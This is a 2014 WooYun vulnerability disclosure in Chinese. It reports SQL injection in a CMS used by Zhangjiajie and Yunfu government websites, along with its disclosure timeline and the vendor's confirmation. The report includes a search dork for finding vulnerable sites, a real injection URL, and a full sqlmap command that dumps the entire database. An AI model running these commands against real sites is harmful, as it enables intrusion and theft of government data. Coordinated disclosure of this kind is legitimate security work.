漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-074161
漏洞标题:云浮信息协会开发的某CMS存在sql注射,可拖裤
相关厂商:云浮信息协会
漏洞作者: 辛县长
提交时间:2014-08-28 12:44
修复时间:2014-10-12 12:46
公开时间:2014-10-12 12:46
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-28: 细节已通知厂商并且等待厂商处理中
2014-09-02: 厂商已经确认,细节仅向厂商公开
2014-09-12: 细节向核心白帽子及相关领域专家公开
2014-09-22: 细节向普通白帽子公开
2014-10-02: 细节向实习白帽子公开
2014-10-12: 细节向公众公开
简要描述:
影响范围:张家界市各政府部门以及云浮市某些政府机构,可拖裤
详细说明:
百度(一定要用百度哦)关键字 “inurl:jsp?topid=”
由于参数“topid”未过滤致使SQL注入发生。
影响的范围包括张家界市的各个政府机构以及云浮市的某些政府机构
以张家界市某政府网站为例 (所有的政府站点都在同一个域名下,即www.zjj.gov.cn)
注入点:http://www.zjj.gov.cn/deptemplates/public/jsp/photos.jsp?topid=002002017&columnid=002002017002001007
漏洞证明:
数据库
其中“YFIIA”为目前使用的数据库,后来经过搜索,YFIIA也就是云浮信息协会的缩写
数据库表结构
经过验证可以脱裤的
sqlmap -u 'http://www.zjj.gov.cn/deptemplates/public/jsp/photos.jsp?topid=002002017&columnid=002002017002001007' --dump-all -D 'YFIIA'
部分裤子如下:
修复方案:
对topid参数过滤处理
版权声明:转载请注明来源 辛县长@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-09-02 11:03
厂商回复:
CNVD确认并复现所述情况,已经由CNVD通过其公开邮箱尝试通报,同时根据测试案例,转由CNCERT发给对应的多个分中心处置。
最新状态:
暂无